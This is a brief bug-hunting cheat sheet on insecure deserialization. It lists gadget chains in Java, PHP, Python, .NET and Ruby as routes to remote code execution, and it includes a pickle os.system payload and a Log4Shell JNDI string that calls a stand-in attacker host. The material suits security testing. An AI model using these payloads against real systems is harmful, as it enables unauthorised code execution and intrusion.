HUNT-DESERIALIZATION — Insecure Deserialization

Crown Jewel Targets

Deserialization bugs are almost always Critical — they lead directly to RCE without prerequisite conditions.

Highest-value chains:

Java ysoserial gadget chains — CommonsCollections, Spring, JNDI, Groovy gadgets → full OS command execution
PHP Object Injection — __wakeup / __destruct magic methods → file write / RCE
Python pickle — pickle.loads(attacker_data) → __reduce__ → os.system('id')
.NET BinaryFormatter — TypeConfuseDelegate gadget chain → RCE
Ruby Marshal.load — Gem::Requirement, Gem::Installer gadgets → RCE
JNDI injection — Log4Shell pattern: ${jndi:ldap://attacker/a} → class load → RCE